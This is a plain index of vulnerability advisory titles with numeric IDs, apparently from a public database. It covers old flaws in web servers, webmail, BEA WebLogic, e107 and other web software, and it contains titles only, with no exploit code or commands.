[10436] e107 Website System Multiple Vulnerabilities
[10421] WildTangent WebDriver Remote Filename Buffer Overflow Vulnerability
[10405] e107 Website System User.PHP HTML Injection Vulnerability
[10395] e107 Website System Log.PHP HTML Injection Vulnerability
[10385] Neon WebDAV Client Library ne_rfc1036_parse Function Heap Overflow Vulnerability
[10362] VBulletin Index.PHP User Interface Spoofing Weakness
[10357] WebCT Campus Edition HTML Tags HTML Injection Vulnerabilities
[10353] NetChat Web Server Remote Buffer Overflow Vulnerability
[10337] Opera Web Browser Address Bar Spoofing Weakness
[10328] BEA WebLogic Server And WebLogic Express Lowered Security Settings Vulnerability
[10327] BEA WebLogic Server and WebLogic Express Denial of Service Vulnerability
[10317] EMule Web Control Panel Denial Of Service Vulnerability
[10316] Open WebMail Remote Command Execution Variant Vulnerability
[10306] Adam Webb NukeJokes Module For PHP-Nuke Multiple Input Validation Vulnerabilities
[10303] MyWeb HTTP Server GET Request Buffer Overflow Vulnerability
[10294] SurgeLDAP Web Administration Authentication Bypass Vulnerability
[10293] e107 Website System Multiple Script HTML Injection Vulnerability
[10274] OMail Webmail Remote Command Execution Variant Vulnerability
[10262] Aldo's Web Server Multiple Input Validation Vulnerabilities
[10260] Business Objects Crystal Reports Web Form Viewer Directory Traversal Vulnerability
[10255] Web Wiz Forum Multiple Vulnerabilities
[10224] HP Web Jetadmin Multiple Vulnerabilities
[10220] PHPWebSite phpwsBB and phpwsContacts Modules Information Disclosure Vulnerability
[10207] Artmedic Webdesign Hpmaker Script Multiple Vulnerabilities
[10188] BEA WebLogic Server And WebLogic Express Configuration Log Files Plain Text Password Vulnerability
[10185] BEA WebLogic Server/Express EJB Object Removal Denial Of Service Vulnerability
[10184] BEA WebLogic Server and WebLogic Express Illegal URI Pattern Potential Bypass Vulnerability
[10169] Fastream NetFile FTP/Web Server Denial Of Service Vulnerability
[10136] Neon WebDAV Client Library Format String Vulnerabilities
[10133] BEA WebLogic Local Password Disclosure Vulnerability
[10132] BEA WebLogic Server and WebLogic Express Certificate Chain User Impersonation Vulnerability
[10131] BEA WebLogic Server/Express Potential Password Disclosure Weakness
[10130] BEA WebLogic Authentication Provider Privilege Inheritance Vulnerability
[10106] Ipswitch IMail Express Web Messaging Buffer Overrun Vulnerability
[10087] Open WebMail Arbitrary Directory Creation Vulnerability
[10081] Opera Web Browser Remote IFRAME Denial Of Service Vulnerability
[10075] Kerio Personal Firewall Web Filtering Remote Denial Of Service Vulnerability
[10056] Microsoft Internet Explorer MSWebDVD Object Denial of Service Vulnerability
[10055] F-Secure BackWeb Local Privilege Escalation Vulnerability
[10051] Multiple Monit Administration Interface Remote Vulnerabilities
[10040] Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
[10001] Cloisterblog Administration Interface Authentication Weakness
[9999] WebCT Campus Edition HTML Injection Vulnerability
[9995] Web Fresh Fresh Guest Book HTML Injection Vulnerability
[9977] Trend Micro Interscan WebManager Java TeleWindow Unspecified Credential Theft Vulnerability
[9973] HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
[9972] HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
[9971] HP Web Jetadmin Printer Firmware Update Script Arbitrary File Upload Weakness
[9966] Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
[9937] XWeb Directory Traversal Vulnerability
[9901] IBM Lotus Domino HTTP webadmin.nsf Quick Console Cross-Site Scripting Vulnerability
[9900] IBM Lotus Domino HTTP webadmin.nsf Directory Traversal Vulnerability
[9894] Fizmez Web Server Null Connection Denial Of Service Vulnerability
[9869] Opera Web Browser Large JavaScript Array Handling Vulnerability
[9868] Oracle Application Server Web Cache HTTP Request Method Heap Overrun Vulnerability
[9864] Novell GroupWise WebAccess Unauthorized Access Vulnerability
[9861] Emumail EMU Webmail Multiple Vulnerabilities
[9856] Dogpatch Software CFWebstore Cross-Site Scripting Vulnerability
[9854] Dogpatch Software CFWebstore SQL Injection Vulnerability
[9847] Pegasi Web Server Multiple Input Validation Vulnerabilities
[9833] IBM WebSphere Unspecified Security Vulnerability
[9817] PWebServer Remote Directory Traversal Vulnerability
[9808] Seattle Lab Software SLWebMail Multiple Buffer Overflow Vulnerabilities
[9807] DAWKCo POP3 with WebMAIL Extension Session Timeout Unauthorized Access Vulnerability
[9795] SureCom Network Device Malformed Web Authorization Request Denial Of Service Vulnerability
[9781] Software602 602Pro LAN Suite Web Mail Installation Path Disclosure Vulnerability
[9777] Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability
[9750] Dell OpenManage Web Server POST Request Heap Overflow Vulnerability
[9749] CalaCode @mail Webmail System POP3 Remote Denial of Service Vulnerability
[9748] CalaCode @mail Webmail System Cross-Site Scripting Vulnerability
[9742] GWeb HTTP Server Directory Traversal Vulnerability
[9723] Avirt Soho Web Service HTTP GET Buffer Overrun Vulnerability
[9716] Proxy-Pro Professional GateKeeper Web Proxy Buffer Overrun Vulnerability
[9693] WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability
[9685] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness
[9681] APC SmartSlot Web/SNMP Management Card Default Password Vulnerability
[9678] Vizer Web Server Remote Denial of Service Vulnerability
[9664] Voice Of Web AllMyPHP Remote File Include Vulnerabilities
[9640] Opera Web Browser CLSID File Extension Misrepresentation Vulnerability
[9625] MaxWebPortal Multiple Input Validation Vulnerabilities
[9576] Web Crossing Web Server Component Remote Denial Of Service Vulnerability
[9561] Sun ONE/iPlanet Web Server HTTP TRACE Credential Theft Vulnerability
[9545] MiniHTTPServer WebForums Forum HTML Injection Vulnerability
[9541] SqWebMail Authentication Response Information Leakage Weakness
[9539] Leif M. Wright Web Blog Remote Command Execution Vulnerability
[9517] Leif M. Wright Web Blog File Disclosure Vulnerability
[9516] BRS WebWeaver ISAPISkeleton.dll Cross-Site Scripting Vulnerability
[9508] Novell Groupwise Webaccess Cross Site Scripting Vulnerability
[9506] WebLogic Server and Express HTTP TRACE Credential Theft Vulnerability
[9505] BEA WebLogic Incorrect Operator Permissions Password Disclosure Vulnerability
[9503] BEA WebLogic Server/Express Potential Administrator Password Disclosure Weakness
[9502] BEA WebLogic Server and Express SSL Client Privilege Escalation Vulnerability
[9501] BEA WebLogic Operator/Admin Password Disclosure Vulnerability
[9495] Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
[9494] Mbedthis Software AppWeb HTTP Server Empty Options Request Denial Of Service Vulnerability
[9486] Borland Webserver for Corel Paradox Directory Traversal Vulnerability
[9482] Reptile Web Server Remote Denial Of Service Vulnerability
[9479] Novell Netware Enterprise Web Server Multiple Vulnerabilities
[9465] Darkwet Network WebcamXP Cross-Site Scripting Vulnerability
[9456] AIPTEK NETCam Webserver Directory Traversal Vulnerability
[9452] GoAhead WebServer Post Content-Length Remote Resource Consumption Vulnerability
[9451] GetWare Web Server Component Content-Length Value Remote Denial Of Service Vulnerability
[9450] GoAhead WebServer Directory Management Policy Bypass Vulnerability
[9418] Symantec Web Security Block Page Message Cross-Site Scripting Vulnerability
[9412] Novell iChain Web Server Failed Login Page Cross-Site Scripting Vulnerability
[9409] Microsoft Exchange Server 2003 Outlook Web Access Random Mailbox Access Vulnerability
[9405] BEA WebLogic Ant Tasks Administrative Password Exposure Vulnerability
[9399] Sun Microsystems Sun One Web Server Remote Buffer Overflow Vulnerability
[9394] DansGuardian Webmin Module Edit.CGI Remote Directory Traversal Vulnerability
[9390] Hand-Crafted Software FreeProxy FreeWeb CreateFile Function Denial of Service Vulnerability
[9388] Hand-Crafted Software FreeProxy FreeWeb Directory Traversal Vulnerability
[9374] Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting Vulnerability
[9373] ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability
[9351] Webcam Corp Webcam Watchdog Web Server Buffer Overflow Vulnerability
[9349] Athena Web Registration Remote Command Execution Vulnerability
[9310] MiniBB Profile Website Name HTML Injection Vulnerability
[9301] Web Merchant Services Storefront Shopping Cart login.asp SQL Injection Vulnerability
[9289] Webfroot Shoutbox Viewshoutbox.PHP Cross-Site Scripting Vulnerability
[9276] PServ Web Server Directory Traversal Vulnerability
[9273] DCAM WebCam Server Personal Web Server Directory Traversal Vulnerability
[9261] PY Software Active Webcam Webserver Cross-Site Scripting Vulnerability
[9260] PY Software Active Webcam Webserver Directory Traversal Vulnerability
[9256] Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
[9239] GoAhead Webserver ASP Script File Source Code Disclosure Vulnerability
[9200] Cyclonic Webmail Information Disclosure Vulnerability
[9195] Cyclonic Webmail Authentication Bypass Vulnerability
[9181] BNCweb BNCquery.pl File Disclosure Vulnerability
[9180] @mail Webmail System Multiple Vulnerabilities
[9171] Abyss Web Server Authentication Bypass Vulnerability
[9169] Webgate WebEye Information Disclosure Vulnerability
[9149] Websense Enterprise Blocked Sites Cross-Site Scripting Vulnerability
[9146] Sun ONE/iPlanet Web Server Unspecified Denial of Service Vulnerability
[9132] Surfboard Web Server File Disclosure Vulnerability
[9118] Microsoft Exchange Server 2003 Outlook Web Access Lowered Security Settings Weakness
[9112] Macromedia JRun Administrative Interface Multiple Cross-Site Scripting Vulnerabilities
[9065] Apple Safari Web Browser Null Character Cookie Stealing Vulnerability
[9060] HP-UX IPFilter Unsupported Interface Vulnerability
[9059] NetServe Web Server Directory Traversal Vulnerability
[9058] SqWebMail Session Hijacking Vulnerability
[9053] phpWebFileManager index.php Directory Traversal Vulnerability
[9051] SAP DB web-tools Multiple Vulnerabilities
[9043] Web Wiz Forums location HTML Injection Vulnerability
[9039] WebWasher Classic Error Message Cross-Site Scripting Vulnerability
[9034] Multiple BEA WebLogic Server/Express Denial of Service and Information Disclosure Vulnerabilities
[9027] Spoofed Kernel Netlink Interface Message Denial of Service Vulnerability
[9021] Opera Web Browser Opera: URI Handler Directory Traversal Vulnerability
[8998] TelCondex SimpleWebserver Directory Traversal Vulnerability
[8965] IA WebMail Server Long GET Request Buffer Overrun Vulnerability
[8957] Web Wiz Forum Unauthorized Private Forum Access Vulnerability
[8947] BRS WebWeaver httpd `User-Agent` Remote Denial of Service Vulnerability
[8943] Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability
[8941] Plug and Play Web Server Remote Denial of Service Vulnerability
[8938] BEA WebLogic InteractiveQuery.jsp Cross-Site Scripting Vulnerability
[8931] BEA Tuxedo and WebLogic Enterprise Input Validation Vulnerability
[8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
[8925] TelCondex SimpleWebserver HTTP Referer Remote Buffer Overflow Vulnerability
[8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
[8909] InfronTech WebTide Directory/File Disclosure Vulnerability
[8887] Opera Web Browser IFRAME Zone Restriction Bypass Vulnerability
[8878] HP Management Software Web Agents Unspecified Unauthorized Access Vulnerability
[8869] PSCS VPOP3 Email Server WebAdmin Cross-Site Scripting Vulnerability
[8866] Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities
[8855] Origo ADSL Router Remote Administrative Interface Configuration Vulnerability
[8854] Emule Web Control Panel HTTP Login Long Password Denial of Service Vulnerability
[8832] Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability
[8810] Rit Research Labs TinyWeb Server Remote Denial of Service Vulnerability
[8782] MiniHTTPServer WebForums Forum HTML Injection Vulnerability
[8777] File Sharing Software Easy File Sharing Web Server Information Disclosure Vulnerability
[8750] FortiGate Firewall Web Filter Logs HTML Injection Vulnerability
[8745] Mutant Penguin MPWeb PRO Directory Traversal Vulnerability
[8726] WebFS Long Pathname Buffer Overrun Vulnerability
[8724] Webfs HTTP Server Information Disclosure Vulnerability
[8723] Megacomputing Personal-WebServer Professional Denial Of Service Vulnerability
[8721] Megacomputing Personal-WebServer Professional Remote Directory Traversal Vulnerability
[8712] Savant Web Server Page Redirect Denial Of Service Vulnerability
[8690] BRS WebWeaver Long URL Request Logging Failure Weakness
[8686] EnGarde WebTool Password Disclosure Vulnerability
[8667] Multiple Plug And Play Web Server FTP Service Command Handler Buffer Overflow Vulnerabilities
[8661] Microsoft BizTalk Server Documentation/WebDAV Weak Permissions Vulnerability
[8645] Plug and Play Web Server Directory Traversal Vulnerability
[8634] Yahoo! Webcam ActiveX Control Buffer Overrun Vulnerability
[8633] MiniHTTPServer WebForum Server Unauthorized Administrative Access Vulnerability
[8632] EFS Software Easy File Sharing Web Server Directory Traversal Vulnerability
[8620] MiniHTTPServer WebForums Server Default Password Vulnerability
[8619] MiniHTTPServer WebForums/File-Sharing for NET Servers Directory Traversal Vulnerability
[8601] 4D WebSTAR FTP Remote Long Password Buffer Overrun Vulnerability
[8583] FutureWave WebX Server Directory Traversal Vulnerability
[8563] ICQ Webfront guestbook Cross-Site Scripting Vulnerability
[8547] FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability
[8545] EZ-WEB Site Builder Advanced Editor Selectedpage Parameter Directory Traversal Vulnerability
[8540] WebCalendar Multiple Module SQL Injection Vulnerabilities
[8539] WebCalendar Multiple Cross-Site Scripting Vulnerabilities
[8524] Check Point Firewall-1 SecuRemote Internal Interface Address Information Leakage Vulnerability
[8508] BEA WebLogic Integration Undisclosed File System Access Vulnerability
[8504] AldWeb MiniPortail LNG Parameter Cross-Site Scripting Vulnerability
[8459] Microsoft RPCSS DCOM Interface Long Filename Heap Corruption Vulnerability
[8451] OMail Webmail Remote Command Execution Vulnerability
[8438] DWebPro Http.ini Plaintext Password Storage Vulnerability
[8437] Attila PHP Content Management System Multiple Web Vulnerabilities
[8424] Skunkweb Cache Module File Disclosure Vulnerability
[8423] Sun One/IPlanet Web Server Windows Denial Of Service Vulnerability
[8422] Skunkweb Error Page Cross-Site Scripting Vulnerability
[8393] PHP Website Multiple Module Cross-Site Scripting Vulnerability
[8390] PHP Website Calendar Module SQL Injection Vulnerabilities
[8383] Web ChatServer HTML Injection Vulnerability
[8374] PostNuke Downloads / Web_Links Modules TTitle Cross-site Scripting Vulnerability
[8363] MiniHTTPServer WebForums Server Null Default Password Vulnerability
[8357] Bea WebLogic/Liquid Data Multiple Cross-Site Scripting Vulnerabilities
[8349] Webware WebKit Cookie String Command Execution Vulnerability
[8325] Novell GroupWise Wireless Webaccess Insecure Logged Password Vulnerability
[8320] BEA WebLogic Server and WebLogic Express User Impersonation Vulnerability
[8279] e107 Website System HTML Injection Vulnerability
[8273] e107 Website System DB.PHP Information Disclosure Vulnerability
[8251] Novell Netware Enterprise Web Server CGI2Perl.NLM Buffer Overflow Vulnerability
[8249] MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability
[8248] 3Com DSL Router Administrative Interface Long Request Router Denial Of Service Vulnerability
[8244] Microsoft Multiple IIS 6.0 Web Admin Vulnerabilities
[8243] Multiple Savant Web Server Denial Of Service Vulnerabilities
[8242] Savant Web Server CGITest.HTML Cross Site Scripting Vulnerability
[8237] WebCalendar Local File Include Information Disclosure Vulnerability
[8234] Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability
[8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
[8181] Twilight WebServer GET Request Buffer Overflow Vulnerability
[8143] Multiple BEA WebLogic Server/Express Vulnerabilities
[8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
[8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
[8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
[8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
[8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
[8122] Mini-Webserver Information Disclosure Vulnerability
[8119] CPanel Admin Interface HTML Injection Vulnerability
[8113] Microsoft Outlook Web Access HTML Attachment Script Execution Vulnerability
[8092] Microsoft IIS _VTI_BOT Malicious WebBot Elevated Permissions Vulnerability
[8075] VisNetic Website Path Disclosure Vulnerability
[8064] Abyss Web Server HTTP Header Injection Vulnerability
[8062] Abyss Web Server HTTP GET Heap Overrun Vulnerability
[8052] WebBBS Guestbook HTML Injection Vulnerability
[8037] BRS WebWeaver Error Page Cross-Site Scripting Vulnerability
[8024] Alt-N WebAdmin USER Parameter Buffer Overflow Vulnerability
[8019] Compaq Web-Based Management Agent Remote File Verification Vulnerability
[8018] VisNetic WebMail Information Disclosure Vulnerability
[8017] Armida Databased Web Server Remote GET Request Denial Of Service Vulnerability
[8015] Compaq Web-Based Management Agent Access Violation Denial of Service Vulnerability
[8014] Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
[8009] Compaq Web-Based Management Agent Multiple Remote Vulnerabilities
[8007] QNX Demo Web Server Directory Traversal Vulnerability
[7996] WebJeff Filemanager Plain Text Password Storage Vulnerability
[7995] WebJeff Filemanager File Disclosure Vulnerability
[7990] WebFS Request-URI Buffer Overflow Vulnerability
[7978] SurfControl Web Filter File Disclosure Vulnerability
[7968] Kerio MailServer Web Mail DO_MAP Module Cross-Site Scripting Vulnerability
[7966] Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
[7955] MiniHTTPServer WebForums Server Remote Directory Traversal Vulnerability
[7947] LocalWEB2000 Information Disclosure Weakness
[7940] Armida Databased Web Server Long Request Denial Of Service Vulnerability
[7937] Noweb/Noroff Insecure Temporary File Creation Vulnerability
[7928] Mailtraq Webmail Remote HTML Injection Vulnerability
[7908] Methodus 3 Web Server File Disclosure Vulnerability
[7890] WebBBS Pro Malicious GET Request Denial Of Service Vulnerability
[7888] silentThought Simple Web Server Directory Traversal Vulnerability
[7884] WebcamNow Plain Text Password Storage Weakness
[7867] Aiglon Web Server Installation Path Information Disclosure Weakness
[7864] Nuca WebServer File Disclosure Vulnerability
[7837] Multiple MaxWebPortal Vulnerabilities
[7833] Synkron.Web HTML Injection Vulnerability
[7822] Forum Web Server Clear Authentication Credentials Storage Weakness
[7815] Mailtraq Webmail Utility Path Disclosure Vulnerability
[7787] Pi3Web SortName Buffer Overflow Vulnerability
[7779] WebChat Users.PHP Cross-Site Scripting Vulnerability
[7777] WebChat Users.PHP Database Username Disclosure Weakness
[7775] Webfroot Shoutbox Expanded.PHP Remote Directory Traversal Vulnerability
[7774] Webchat Module Path Disclosure Weakness
[7772] Webfroot Shoutbox Expanded.PHP Remote Command Execution Vulnerability
[7766] WebCortex WebStores2000 SQL Injection Vulnerability
[7754] Pablo Software Solutions Baby Web Server Directory Traversal Vulnerability
[7752] Pablo Software Solutions Baby Web Server Multiple Connection Denial Of Service Vulnerability
[7746] Webfroot Shoutbox Remote Command Execution Vulnerability
[7737] Webfroot Shoutbox URI Parameter File Disclosure Vulnerability
[7735] Microsoft IIS WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability
[7695] BRS WebWeaver POST and HEAD Denial Of Service Vulnerability
[7619] Snowblind Web Server HTTP GET Request Buffer Overflow Vulnerability
[7618] Snowblind Web Server File Disclosure Vulnerability
[7617] Snowblind Web Server Malformed HTTP Request Denial Of Service Vulnerability
[7591] BEA WebLogic JDBCConnectionPoolRuntimeMBean On-Screen Password Disclosure Vulnerability
[7589] PHP-Nuke Web_Links Module Path Disclosure Vulnerability
[7587] BEA Systems WebLogic Encryption Information Disclosure Weakness
[7586] BEA Systems WebLogic CredentialMapper Plaintext Password Vulnerability
[7563] BEA Systems WebLogic Multiple Password Storage Vulnerabilities
[7558] PHPNuke Web_Links Module Remote SQL Injection Vulnerability
[7555] Pi3Web Malformed GET Request Denial Of Service Vulnerability
[7544] Boa Webserver File Disclosure Vulnerability
[7528] BVRP SLWebmail Multiple Path Disclosure Bugs Vulnerability
[7527] BVRP SLWebmail GUI Applications Denial Of Service Vulnerability
[7526] BVRP SLMail Administrative Interface Information Disclosure Vulnerability
[7525] BVRP SLMail Administrative Interface Directory Traversal Vulnerability
[7524] BVRP SLWebMail LANGUAGE Variable Buffer Overflow Vulnerability
[7514] BVRP Software SLWebmail Multiple Buffer Overflow Vulnerabilities
[7513] BVRP Software SLWebmail ShowGodLog.DLL File Disclosure Vulnerability
[7511] BVRP Software SLWebmail Path Disclosure Vulnerability
[7501] CommuniGate Pro Webmail Session Hijacking Vulnerability
[7490] WebcamXP Message Field HTML Code Injection Vulnerability
[7479] MDG Web Server 4D HTTP Command Buffer Overflow Vulnerability
[7470] Microsoft BizTalk Server DTA Interface SQL Injection Vulnerability
[7439] Alt-N WebAdmin Remote File Disclosure Vulnerability
[7438] Alt-N WebAdmin Remote File Viewing Vulnerability
[7425] BRS WebWeaver RETR Command Denial Of Service Vulnerability
[7413] Cisco Secure ACS Management Interface Login Field Buffer Overflow Vulnerability
[7410] Xeneo Web Server Undisclosed Buffer Overflow Vulnerability
[7409] Web Protector Trivial Encryption Weakness
[7398] Xeneo Web Server Denial Of Service Vulnerability
[7392] 360 Degree Web PlatinumKey Access Control Bypass Application Execution Vulnerability
[7391] 360 Degree Web PlatinumKey Access Control Bypass Information Disclosure Vulnerability
[7390] MPCSoftWeb Database Disclosure Vulnerability
[7389] MPCSoftWeb Guest Book HTML Injection Vulnerability
[7380] Web Wiz Forum Information Disclosure Vulnerability
[7371] NetGear Router Administrative Interface Content Filter Log Script Injection Vulnerability
[7368] TW-WebServer Denial Of Service Vulnerability
[7366] Novell GroupWise WebAccess Information Disclosure Vulnerability
[7362] Ashley Brown iWeb Server Directory Traversal Vulnerability
[7341] Web Wiz Site News Information Disclosure Vulnerability
[7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
[7331] WebGUI HTTPProxy Denial Of Service Vulnerability
[7287] Abyss Web Server Incomplete HTTP Request Denial Of Service Vulnerability
[7285] BRS WebWeaver User Password Encryption Weakness
[7283] BRS WebWeaver Information Disclosure Vulnerability
[7280] BRS WebWeaver Long Request Remote Denial of Service Vulnerability
[7277] WebC.CGI Environment Variable Buffer Overflow Vulnerability
[7274] WebC Local Configuration File Format String Vulnerability
[7272] AutomatedShops WebC Symbolic Link Following Configuration File Weakness
[7268] AutomatedShops WebC Script Name Remote Buffer Overrun Vulnerability
[7257] BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
[7255] Apache Web Server File Descriptor Leakage Vulnerability
[7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
[7232] Beanwebb Guestbook Unauthorized Administrative Access Vulnerability
[7231] Beanwebb Guestbook HTML Injection Vulnerability
[7227] Multiple Vendor Web Browser LiveConnect JavaScript Denial Of Service Vulnerability
[7190] Web Chat Manager HTML Code Injection Vulnerability
[7131] BEA Systems WebLogic JNDI Tree Modify Access Vulnerability
[7130] BEA WebLogic Web Application Authentication Bypass Vulnerability
[7127] MyAbraCadaWeb Search Engine Cross-Site Scripting Vulnerability
[7126] MyAbraCadaWeb Path Disclosure Vulnerability
[7124] BEA WebLogic Remote Unprivileged Administration Access Vulnerability
[7122] BEA WebLogic Internal Servlet Input Validation Vulnerabilities
[7115] Outblaze Webmail Cookie Authentication Bypass Vulnerability
[7055] GreyMatter WebLog Remote Command Execution Vulnerability
[7038] Lotus Notes/Domino Web Retriever Buffer Overflow Denial Of Service Vulnerability
[7022] Dr.Web Virus Scanner Folder Name Buffer Overflow Vulnerability
[7016] WebLog Expert Logfile HTML Injection Vulnerability
[7015] WebLog Expert HTTP Header Code Injection Vulnerability
[7013] WebTrends Analysis Suite Logfile HTML Injection Vulnerability
[7000] Webchat Defines.PHP Remote File Include Vulnerability
[6996] Web-ERP Configuration File Remote Access Vulnerability
[6988] Typo3 Webroot Folders Information Disclosure Weakness
[6951] IBM Lotus Domino Web Server HTTP POST Denial Of Service Vulnerability
[6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
[6939] Apache Web Server ETag Header Information Disclosure Weakness
[6933] phpWebFileManager File Disclosure Vulnerability
[6915] Webmin/Usermin Session ID Spoofing Unauthenticated Access Vulnerability
[6896] Novell GroupWise WebAccess Unspecified Malicious Script Vulnerability
[6885] cPanel Openwebmail Local Privileges Escalation Vulnerability
[6871] IBM Lotus Domino Web Server iNotes s_ViewName/Foldername Buffer Overflow Vulnerability
[6826] iPlanet Web Server Response Header Buffer Overflow Vulnerability
[6758] IBM WebSphere Exported XML Password Encoding Weakness
[6736] HP Compaq Insight Manager/Compaq Web Agent Session Persistence Vulnerability
[6729] Deerfield Website Pro Remote Denial of Service Vulnerability
[6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
[6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
[6719] BEA WebLogic Keystore Clear Text Password Storage Vulnerability
[6717] BEA Systems WebLogic Server and Express Session Sharing Vulnerability
[6682] Sun JSSE/Java Plug-In/Java Web Start Incorrect Certificate Validation Vulnerability
[6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
[6661] Apache Web Server Default Script Mapping Bypass Vulnerability
[6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
[6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
[6635] fnord Web Server Buffer Overflow Vulnerability
[6599] Xitami Webserver Administrative Port Buffer Overflow Vulnerability
[6586] Bea Systems WebLogic ResourceAllocationException System Password Disclosure Vulnerability
[6585] BRS WebWeaver MKDir Directory Traversal Weakness
[6581] Simple Web Counter URI Parameter Buffer Overflow Vulnerability
[6576] BRS WebWeaver MKDir FTP Root Path Disclosure Vulnerability
[6574] Follett Software WebCollection Plus File Reading Vulnerability
[6569] Business Objects WebIntelligence Application Session Hijacking Vulnerability
[6549] GeneWeb File Disclosure Vulnerability
[6542] CommuniGate Pro Webmail File Disclosure Vulnerability
[6540] H-Sphere Webshell diskusage.cc Buffer Overflow Vulnerability
[6539] H-Sphere Webshell Command2.CC Zipfile URI Parameter Command Execution Vulnerability
[6538] H-Sphere Webshell flist() Buffer Overflow Vulnerability
[6537] H-Sphere Webshell Command.C Mode URI Parameter Command Execution Vulnerability
[6527] H-Sphere Webshell Remote Buffer Overrun Vulnerability
[6514] ELog Web Logbook Multiple Buffer Overflow Vulnerabilities
[6500] N/X Web Content Management System Remote File Include Vulnerability
[6491] Web-cyradm Remote Denial of Service Vulnerability
[6433] CUPS HTTP Interface Integer Overflow Vulnerability
[6425] Open WebMail Arbitrary Script Execution Vulnerability
[6411] Captaris Infinite WebMail HTML Injection Vulnerability
[6400] PHP-Nuke Web Mail Script Injection Vulnerability
[6399] PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability
[6385] Webshots Desktop Screen Saver Password Bypassing Vulnerability
[6378] Bea Systems WebLogic Xerces XML Parser Denial Of Service Vulnerability
[6369] Deerfield VisNetic WebSite Cross Site Scripting Vulnerability
[6364] Deerfield VisNetic Website OPTIONS Memory Corruption Vulnerability
[6327] Sapio WebReflex Directory Traversal Vulnerability
[6326] Cobalt RaQ4 Administrative Interface Command Execution Vulnerability
[6292] Webster HTTP Server Cross Site Scripting Vulnerability
[6291] Webster HTTP Server File Disclosure Vulnerability
[6289] Webster HTTP Server Long Request Buffer Overrun Vulnerability
[6288] McAfee VirusScan WebScanX Code Execution Vulnerability
[6271] pWins Web Server Directory Traversal Vulnerability
[6251] Web Server Creator Web Portal Remote File Include Vulnerability
[6232] Open WebMail User Name Information Disclosure Vulnerability
[6189] Courier SqWebMail File Disclosure Vulnerability
[6180] KeyFocus KF Web Server Directory Traversal Vulnerability
[6165] Xoops WebChat Module Remote SQL Injection Vulnerability
[6147] Sun Solaris Network Interface Denial Of Service Vulnerability
[6145] Simple Web Server File Disclosure Vulnerability
[6126] Macromedia JRun Web Server Unicode Source Disclosure Vulnerability
[6098] Northern Solutions Xeneo Web Server Denial Of Service Vulnerability
[6070] Microsoft IIS WebDAV Denial Of Service Vulnerability
[6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
[6061] Sun Solaris Web-Based Enterprise Management Insecure Default File Permissions Vulnerability
[6042] LiteServe Web Server File Disclosure Vulnerability
[6041] BRS WebWeaver Web Server File Access Vulnerability
[6034] Radiobird Software WebServer 4 All Host Field Header Buffer Overflow Vulnerability
[6014] NOCC Webmail View Headers HTML Injection Vulnerability
[6006] Software602 Web602 Web Server Unauthorized Admin Directory Access Vulnerability
[6002] IBM Websphere Caching Proxy Denial Of Service Vulnerability
[6001] IBM Websphere Edge Server HTTP Header Injection Vulnerability
[6000] IBM Websphere Edge Server Cross Site Scripting Vulnerability
[5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
[5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
[5988] PlanetDNS PlanetWeb Malformed Request Remote Buffer Overflow Vulnerability
[5980] Microsoft SQL Server Web Task Stored Procedure Privilege Escalation Vulnerability
[5971] BEA WebLogic Server/Express/Integration Application Migration Security Policy Weakness
[5968] RadioBird Software WebServer 4 All Directory Traversal Vulnerability
[5967] RadioBird Software WebServer 4 All Buffer Overflow Vulnerability
[5961] TelCondex SimpleWebServer Denial Of Service Vulnerability
[5954] My Web Server Long Get Request Denial Of Service Vulnerability
[5949] SquirrelMail Options.PHP Web Root Path Disclosure Vulnerability
[5936] Webmin Static SSL Key Vulnerability
[5902] Oracle 9i Application Server Web Cache Administration Tool Denial Of Service Vulnerability
[5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
[5864] PHPWebSite Article.PHP Cross-Site Scripting Vulnerability
[5859] SurfControl SuperScout WebFilter SQL Injection Vulnerability
[5857] SurfControl SuperScout WebFilter File Disclosure Vulnerability
[5856] SurfControl SuperScout WebFilter User Accounts Information Disclosure Vulnerability
[5854] SurfControl SuperScout WebFilter Malformed GET Request DoS Vulnerability
[5846] BEA WebLogic Server and Express Inadvertent Security Removal Weakness
[5823] EmuMail Web Root Path Disclosure Vulnerability
